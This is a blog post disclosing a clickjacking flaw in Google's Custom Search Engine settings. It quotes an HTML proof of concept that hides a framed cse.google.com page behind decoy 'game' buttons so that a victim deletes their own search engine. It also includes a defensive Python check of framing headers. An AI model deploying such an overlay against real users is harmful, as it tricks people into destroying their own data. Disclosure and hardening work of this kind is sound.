I Found Clickjacking on Google CSE. Is This Important?

Feb 10, 2019 · 2 min read

While I was testing, I found that cse.google.com is vulnerable to clickjacking, so I checked whether the settings page is vulnerable or not, and it was, so now this has a risk! The attacker could delete someone’s CSE.

Summary: An attacker can delete the victim’s CSE.

Steps to reproduce:

  1. Go to https://cse.google.com/
  2. It can be embedded into any webpage.
  3. Attacker may manipulate the HTML template so it can delete the victim’s CSE.

I wrote exploit code for the clickjacking, and here is the exploit code:

<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>

By using the clickjacking technique, an attacker can make someone unknowingly delete their CSE.
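Whether a page can be framed like this comes down to the framing restrictions in its response headers. The check below is an added example, not code from the original post or from Google: it evaluates constructed header sets (not captured from cse.google.com) against a hypothetical page origin and attacker origin, and shows the headers that would have prevented the embedding above.

```python
"""Decide whether an HTTP response permits cross-origin framing (clickjacking).

Added example, not from the original post. All header sets and origins below
are constructed samples, not captured from cse.google.com.
"""
from urllib.parse import urlparse


def _csp_frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP header, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def frameable_by(headers: dict, page_origin: str, attacker_origin: str) -> bool:
    """True if attacker_origin could embed the page in an <iframe>.

    CSP frame-ancestors takes precedence when present; otherwise X-Frame-Options
    is consulted. With neither header, anyone can frame the page.
    Host wildcards such as *.example.com are not handled here.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    ancestors = _csp_frame_ancestors(lower.get("content-security-policy", ""))
    if ancestors is not None:
        if "'none'" in ancestors:
            return False
        for src in ancestors:
            if src == "*":
                return True
            if src == "'self'":
                if attacker_origin == page_origin:
                    return True
            elif src.endswith(":"):  # scheme source such as https:
                if urlparse(attacker_origin).scheme + ":" == src:
                    return True
            elif src == attacker_origin.lower():
                return True
        return False
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return attacker_origin == page_origin
    return True  # absent or obsolete ALLOW-FROM: no effective protection


PAGE = "https://cse.example"           # constructed stand-in for the settings page
ATTACKER = "https://attacker.example"  # constructed attacker origin
UNPROTECTED = {"Content-Type": "text/html"}
HARDENED = {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'"}
SAME_ORIGIN_ONLY = {"Content-Security-Policy": "frame-ancestors 'self'"}
```

Sending both headers in HARDENED covers browsers with and without CSP support; the X-Frame-Options value is what the check returns when frame-ancestors is missing.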

For how an attacker can make someone unknowingly delete their CSE, you can check my video POC here:

Enough about the explanation.

Okay, the problem has just begun. My findings above are, in my opinion, valid bugs. Why? Because the attacker can delete someone’s data (CSE); isn’t this a bug? But the response I got was very surprising.

The part that confuses me is: how is this not a bug? Because in my head it is clear that I can delete other people’s data.

What do you think? Is this a bug? Or is it just me who overestimates this as a bug?

This article was already published on dev.to.
